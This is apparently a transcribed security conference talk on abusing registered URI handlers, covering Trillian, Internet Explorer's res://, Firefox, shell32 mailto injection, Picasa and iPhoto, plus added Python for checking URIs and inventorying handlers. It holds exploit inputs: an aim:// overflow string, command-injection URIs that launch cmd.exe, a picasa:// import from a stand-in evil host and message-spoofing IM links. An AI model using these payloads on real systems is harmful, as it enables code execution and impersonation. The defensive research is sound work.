# URI Use and Abuse

-----

## Contributing Authors

- Nathan McFeters – Senior Security Analyst – Ernst & Young Advanced Security Center, Chicago
- Billy Kim Rios – Senior Researcher – Microsoft, Seattle
- Rob Carter – Security Analyst – Ernst & Young Advanced Security Center, Houston

-----

## URIs – An Overview

- Generic
  - http://, ftp://, telnet://, etc.
- What else is registered?
  - aim://, firefoxurl://, picasa://, itms://, etc.

-----

## URIs – Interaction With Browsers

- Developers create URI hooks in the registry for their applications
- Once registered, they can be accessed and interacted with through the browser
- XSS can play too!

-----

## URI Discovery – Where and What?

- RFC 4395 defines an IANA-maintained registry of URI schemes
- W3C maintains *retired* schemes
- AHA! The registry! Enter DUH!

-----

## DUH Tool – Sample Output

[screenshot]

-----

## Attacking URIs – Attack Scope

- URIs link to applications
- Applications are vulnerable to code flaws and functionality abuse
- URIs can be reached through XSS exposures

-----

## Stack Overflow in Trillian's aim.dll Through the aim:// URI

- The aim:// URI is associated with the command `Rundll32.exe "C:\Program Files\Trillian\plugins\aim.dll", aim_util_urlHandler url="%1" ini="c:\program files\trillian\users\default\cache\pending_aim.ini"`.
- The attacker controls the value that is put into aim_util_urlHandler through the URI, such as aim://MyURL.
- The value is copied without bounds checking, leading to a stack overflow.
- Example:

```text
aim:///#1111111/111111111111111111111111111111111111111111111111111111111111111111222222222222222222222222222222222222222222222222222222222222223333333333333333333333333333333333333333333333333333333333333444444444444444444444444444444444444444444444444444444444444444555555555555555555555555555555555555555555555555555555555555556666666AAAABBBB666666666666666666666666666666666666666666666666666666666666677777777777777777777777777777777777777777777777777777777777777788888888888888888888888888888888888888888888888888888888888888899999999999999999999999999999999999999999999999999999999999999900000000000000000000000000000000000000000000000000000000000000000
```

-----

## Stack Overflow Caught By OllyDbg

[screenshot]

-----

## Control of Pointer to Next SEH Record and SE Handler

[screenshot]

-----

## Command Injection in Call to Trillian's aim.dll Through XSS

- The command associated with aim:// takes two arguments: "URL" (which we control) and "ini", which is set by default to `C:\Program Files\Trillian\users\default\cache\pending_aim.ini`.
- The attacker can inject a `"` to close off the "uri" command line argument and can then inject a new "ini" parameter.
- The "ini" parameter is used to specify a file location to write startup data to.
- We can control some of that startup data through the aim:// URI.

[screenshot]

-----

## Bug in Microsoft's IFrame.dll Through res:// URI (MS07-035)

- The res:// URI is a predefined pluggable protocol in Microsoft that allows content like images, HTML, XSL, etc. to be pulled from DLLs or executables.
  - Ex: res://ieframe.dll/info_48.png
- You have seen this, you just might not know it: the blue "?" on IE's 404 page and other common error pages is loaded using res://.
- Playing with the res:// URI, it was discovered that the browser would crash if the following URI was accessed: res://ieframe.dll/#111111/1
- Further testing led to res://ieframe.dll/#111111AAAAAA… (long string of A's)…AA/1, which caused

[screenshots]

-----

## Cross Browser Scripting – IE pwns Firefox and Netscape Navigator

- Firefox and Netscape Navigator 9 register URIs to be "compliant with Windows Vista".
- These URIs ("firefoxurl" and "navigatorurl") are vulnerable to command injection when called from IE.
- Gecko based browsers accept the `-chrome` argument, and we can inject this to supply arbitrary JavaScript code that allows us to

[screenshot]

-----

## Command Injection in Firefox and All Gecko Based Browsers, Microsoft Outlook, etc.

- This is actually caused by a flaw in Microsoft's shell32.dll file on non-Vista machines.
- Was fixed for Firefox by the Mozilla security team in version 2.0.0.7.

[screenshot]

- The following URIs will cause a command injection:

```text
mailto:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat
nntp:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat
news:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat
snews:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat
telnet:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat
```

-----

## Trust-based Applet Attack against Google's Picasa (T-bAG)

- picasa://importbutton?url=http://shadyshady.com/evilbutton.xml
- Yep, that's right, it imports a remote XML description of a button
- If that button is loaded from OUR server and clicked, we get to see all those naughty pictures of your girlfriend

-----

## The Plan – Ghetto Whiteboard Edition

[whiteboard photo]

-----

## The Plan – Ghetto Diagram Edition

[Diagram with the nodes "The Hacker", "YouTube, MySpace", "Victim's Web Browser" and "Attack Server", and the steps "Hacker plants XSS", "Victim gets pwned" and "Load Flash, Rebind, Steal Images"]

-----

## Trust-based Applet Attack against Google's Picasa (T-bAG)

The button.pbf file looks like so:

[screenshot]

- When the button is clicked, Picasa starts up its own instance of Internet Explorer to open up whatever is at http://natemcfeters.com/pwn.py
- The really interesting thing is what Picasa SENDS:

-----

## What's Sent by Picasa?!

[screenshot]

-----

## Why Flash?

- We chose Flash to exploit our client-side attack vector for three reasons:
  1. It is vulnerable to DNS rebinding attacks.
  2. If a valid crossdomain.xml file is present, we can connect back to our attack server.
  3. As of ActionScript 3.0 we now have access to a Socket class that can read and write raw binary data.
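The Trillian ini override, the firefoxurl `-chrome` injection and the shell32 mailto/nntp/news/snews/telnet cases above share one root cause: the browser pastes the raw URI into a command-line template (`%1`) and nothing verifies that the result is still a single argument. The following Python is an added example, not code from the talk or from any of the vendors named; it shows how an unchecked URI adds an argument to the Trillian command from the slide, and a check a browser or handler could apply before the handoff. The `MAX_URI_LEN` value, the `split_args` splitter (a simplified, not Windows-faithful tokenizer) and the injection string are constructed for the demonstration.

```python
import re
from typing import List
from urllib.parse import unquote

# Handler command as registered for aim:// on the Trillian slide; "%1" is
# replaced with the raw URI the browser was asked to open.
TRILLIAN_AIM_TEMPLATE = (
    'Rundll32.exe "C:\\Program Files\\Trillian\\plugins\\aim.dll", '
    'aim_util_urlHandler url="%1" '
    'ini="c:\\program files\\trillian\\users\\default\\cache\\pending_aim.ini"'
)

MAX_URI_LEN = 1024  # constructed limit for the demo; size it to the real handler's buffer


def expand_template(template: str, uri: str) -> str:
    """Naive %1 substitution, the way the shell builds the handler command line."""
    return template.replace("%1", uri)


def split_args(cmdline: str) -> List[str]:
    """Simplified quote-aware split: double quotes group a token, whitespace
    outside quotes separates tokens. Constructed to show where argument
    boundaries fall; it ignores backslash escaping and is not a faithful
    CommandLineToArgvW."""
    args: List[str] = []
    cur: List[str] = []
    in_quote = False
    for ch in cmdline:
        if ch == '"':
            in_quote = not in_quote
        elif ch.isspace() and not in_quote:
            if cur:
                args.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        args.append("".join(cur))
    return args


def extra_argument_count(template: str, uri: str) -> int:
    """How many arguments the URI adds beyond what a trivial URI produces.
    Anything above 0 means the URI escaped its "%1" slot."""
    baseline = len(split_args(expand_template(template, "x:")))
    return len(split_args(expand_template(template, uri))) - baseline


_SCHEME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.\-]*:")


def check_uri_argument(uri: str) -> List[str]:
    """Reasons a URI must not be substituted into a handler command template.
    Empty list means acceptable. Percent-escapes are decoded first, because
    the browser decodes %00 / %22 before the handler ever sees the string."""
    problems: List[str] = []
    if not _SCHEME_RE.match(uri):
        problems.append("missing or malformed scheme")
    if len(uri) > MAX_URI_LEN:
        problems.append("longer than MAX_URI_LEN (unbounded copy / overflow risk)")
    decoded = unquote(uri)
    if '"' in decoded:
        problems.append('double quote closes the "%1" argument (parameter injection)')
    if any(ord(c) < 0x20 for c in decoded):
        problems.append("NUL or control character (truncation / argument splitting)")
    return problems


if __name__ == "__main__":
    benign = "aim://goim?screenname=bob"
    # Constructed injection modelled on the slide: close url="..." and add an ini= argument.
    injected = 'aim://x" ini="C:\\evil.ini'
    for u in (benign, injected, "mailto:%00%00../../x", "aim:///#1/" + "A" * 2000):
        print(repr(u[:40]), "extra args:", extra_argument_count(TRILLIAN_AIM_TEMPLATE, u),
              "problems:", check_uri_argument(u) or "none")
```

The argument count is the detection side: run it over the handler commands a DUH-style inventory finds and any URI that changes the count has escaped its quoting. The check function is the mitigation side: it rejects the three shapes the talk relies on (a quote, a NUL, an oversized value) before the URI reaches a `%1` template, which is cheaper than fixing every registered handler.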
-----

## Trust-based Applet Attack against Google's Picasa (T-bAG)

[screenshot]

-----

## PDP's PDF Sploit

- One of the URI/protocol handler attack vectors that gained a lot of publicity was the PDF based attack by PDP
- This was based off of our same mailto: command injection, and in fact, the version in the wild also uses this

-----

## Stupid IM Trick

- I want to talk to your girlfriend as if I'm you!
  - `ymsgr:sendim?yourGirlFriend&m=I+think+we+should+break+up…+sorry+but+its+you+not+me`
  - `gtalk:chat?jid=Pwn1ch1wa@gmail.com`
  - `gtalk:call?jid=Pwn1ch1wa@gmail.com`
  - `gtalk:voicemail?jid=Pwn1ch1wa@gmail.com`
  - `aim:goim?screenname=yourGirlFriend&m=I+really+think+you'd+be+happier+with+Nate`
  - skype, Gadu-Gadu, Jabber, etc.

-----

## Yep, They're Stupid, but…

- Aside from stealing your girlfriend and causing a denial of service on you…
- What if you could XSS a lot of people from one page and then force their browsers to loop through sending as many of these messages as possible?
- DDoS on all chat providers, anyone?

-----

## What's Next? *Nix Anyone?

- Why oh why is no one talking about *Nix yet. Why? No registry… or is there? AHA! DUH4Linux.sh!

```bash
#!/bin/bash
# List every GNOME URL handler registered in gconf together with its command.
# The directory names under /desktop/gnome/url-handlers are the scheme names
# (field 5 of the slash-separated path); each one has a "command" key.
gconftool-2 /desktop/gnome/url-handlers --all-dirs | cut --delimiter=/ -f 5 | while read -r line; do
  gconftool-2 "/desktop/gnome/url-handlers/$line" -a | grep -i 'command' | cut --delimiter== -f 2 | while read -r line2; do
    echo "$line $line2"
  done
done
```

-----

## Output from DUH 4 Linux

```text
-bash-3.00$ ./DUH4Linux.sh
man gnome-help "%s"
cdda /usr/libexec/gnome-cdda-handler %s
aim gaim-remote uri "%s"
info gnome-help "%s"
server-settings nautilus "%s"
applications nautilus "%s"
https firefox %s
unknown mozilla "%s"
ghelp gnome-help "%s"
h323 gnomemeeting -c %s
about firefox %s
trash nautilus "%s"
http firefox %s
system-settings nautilus "%s"
callto gnomemeeting -c %s
mailto evolution %s
```

-----

## An Apple a Day Keeps the Hackers at Bay? Yeah, right.

- DUH4Mac was developed for me by Carl Lindberg, the same guy who brought us RCDefaultApp for turning these off on a Mac
- It has already helped us uncover one bug in Mac URI handlers

-----

## Output From DUH4Mac

| URL Name | App Bundle ID | App (Current Path) |
|---|---|---|
| mailto | | Mail (/Applications/Mail.app) |
| pcast | com.apple.itunes | iTunes (/Applications/iTunes.app) |
| x-man-page | | Terminal (/Applications/Utilities/Terminal.app) |
| ftp | org.mozilla.firefox | Firefox (/Applications/Firefox.app) |
| im | | iChat (/Applications/iChat.app) |
| applescript | | Editor (/Applications/AppleScript/ScriptEditor.app) |
| webcal | com.apple.ical | iCal (/Applications/iCal.app) |
| directoryconnection | | (/Applications/Utilities/Directory Utility.app) |
| rtsp | | QuickTime (/Applications/QuickTime Player.app) |
| Keynote | | Keynote (/Applications/iWork '06/Keynote.app) |
| ichat | | iChat (/Applications/iChat.app) |
| feed | | Safari (/Applications/Safari.app) |
| ssh | | Terminal (/Applications/Utilities/Terminal.app) |
| message | | Mail (/Applications/Mail.app) |
| afp | | Finder (/System/Library/CoreServices/Finder.app) |
| daap | com.apple.itunes | iTunes (/Applications/iTunes.app) |
| mmsu | | WMV (/Applications/Flip4Mac/WMV Player.app) |
| … | | |

-----

## iPhoto Pwnage for Fun and Profit

- A format string vulnerability exists in iPhoto which can be triggered by enticing a user to subscribe to a maliciously crafted photocast
- A remote attacker may be able to cause arbitrary code execution

[screenshot slides]

-----

## And… Just in Time for Tax Season

- TurboTax on the Mac brings you friendly URIs… WHY?!
  - com.intuit.ctg.tpshelpscreen
  - com.intuit.ctg.tpsformaddress
  - com.intuit.ctg.tpsformfieldhelp
  - com.intuit.ctg.easystepjump

-----

## Conclusions and Questions

- We enjoy guns, beautiful FBI women, and loud music… any ladies out there that can help us with all three?
- Any questions?

-----
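The DUH tools above (the registry-driven DUH on Windows, the gconftool loop of DUH4Linux, DUH4Mac) all answer the same defender's question: which schemes will this machine hand to which command? The Python below is an added example, not the DUH code from the talk; it is the Windows-registry counterpart of the DUH4Linux script. It parses a `reg export HKCR` text for keys that carry the `URL Protocol` marker value and pairs each scheme with its `shell\open\command`, so an inventory can be taken offline from an exported file and the `%1` handlers reviewed. The `SAMPLE_REG_EXPORT` is constructed (the aim command is the one from the Trillian slide; the browser path is made up), and `enumerate_windows_handlers` uses the `winreg` calls as I know them and only runs on Windows.

```python
import sys
from typing import Dict, List, NamedTuple, Optional, Tuple

# Constructed .reg export: two URL protocol handlers and one ordinary file class.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\aim]
@="URL:AIM Protocol"
"URL Protocol"=""

[HKEY_CLASSES_ROOT\aim\shell\open\command]
@="Rundll32.exe \"C:\\Program Files\\Trillian\\plugins\\aim.dll\", aim_util_urlHandler url=\"%1\" ini=\"c:\\program files\\trillian\\users\\default\\cache\\pending_aim.ini\""

[HKEY_CLASSES_ROOT\http]
@="URL:HyperText Transfer Protocol"
"URL Protocol"=""
"EditFlags"=dword:00000002

[HKEY_CLASSES_ROOT\http\shell\open\command]
@="\"C:\\Program Files\\Example Browser\\browser.exe\" -- \"%1\""

[HKEY_CLASSES_ROOT\.txt]
@="txtfile"
'''


class Handler(NamedTuple):
    scheme: str
    description: str
    command: str
    uri_quoted: Optional[bool]  # None: command does not take %1 at all


def _read_quoted(s: str, i: int) -> Tuple[str, int]:
    """Parse a .reg double-quoted string starting at s[i] == '"'. Returns the
    value and the index after the closing quote; backslash escapes the next
    character (\\ and \" are the escapes .reg files use)."""
    out: List[str] = []
    i += 1
    while i < len(s):
        ch = s[i]
        if ch == "\\" and i + 1 < len(s):
            out.append(s[i + 1])
            i += 2
            continue
        if ch == '"':
            return "".join(out), i + 1
        out.append(ch)
        i += 1
    raise ValueError("unterminated string in .reg line: " + s)


def parse_reg_export(text: str) -> Dict[str, Dict[str, str]]:
    """Map lower-cased key path -> {value name: data}. REG_SZ data is decoded;
    other types (dword:, hex:) are kept raw. The default value is named '@'."""
    keys: Dict[str, Dict[str, str]] = {}
    current: Optional[Dict[str, str]] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = keys.setdefault(line[1:-1].lower(), {})
            continue
        if current is None:
            continue
        if line.startswith("@"):
            name, rest = "@", line[1:]
        elif line.startswith('"'):
            name, j = _read_quoted(line, 0)
            rest = line[j:]
        else:
            continue
        if not rest.startswith("="):
            continue
        data = rest[1:]
        if data.startswith('"'):
            data, _ = _read_quoted(data, 0)
        current[name] = data
    return keys


def url_protocol_handlers(keys: Dict[str, Dict[str, str]]) -> List[Handler]:
    """Every top-level HKCR key with a 'URL Protocol' value is a scheme the
    browser will hand off; pair each with its open command."""
    found: List[Handler] = []
    for path, values in keys.items():
        parts = path.split("\\")
        if len(parts) != 2 or parts[0] != "hkey_classes_root":
            continue
        if not any(n.lower() == "url protocol" for n in values):
            continue
        cmd = keys.get(f"hkey_classes_root\\{parts[1]}\\shell\\open\\command", {}).get("@", "")
        quoted = None if "%1" not in cmd else ('"%1"' in cmd)
        found.append(Handler(parts[1], values.get("@", ""), cmd, quoted))
    return sorted(found)


def enumerate_windows_handlers() -> List[Handler]:
    """Live inventory through winreg; returns [] on non-Windows hosts."""
    if sys.platform != "win32":
        return []
    import winreg  # only importable on Windows
    found: List[Handler] = []
    with winreg.OpenKey(winreg.HKEY_CLASSES_ROOT, "") as root:
        i = 0
        while True:
            try:
                name = winreg.EnumKey(root, i)
            except OSError:
                break
            i += 1
            try:
                with winreg.OpenKey(root, name) as k:
                    winreg.QueryValueEx(k, "URL Protocol")  # raises if absent
                    cmd = winreg.QueryValue(k, r"shell\open\command")
                    desc = winreg.QueryValue(k, "")
            except OSError:
                continue
            found.append(Handler(name, desc, cmd, None if "%1" not in cmd else ('"%1"' in cmd)))
    return sorted(found)


if __name__ == "__main__":
    for h in url_protocol_handlers(parse_reg_export(SAMPLE_REG_EXPORT)):
        print(f"{h.scheme:<8} quoted=%1:{h.uri_quoted}  {h.command}")
```

The `uri_quoted` field is the first triage signal: a handler whose `%1` is unquoted splits on the first space, and one whose `%1` is quoted still splits on the first `"` (the Trillian and firefoxurl cases), so every handler that takes `%1` at all belongs on the review list, with the unquoted ones at the top.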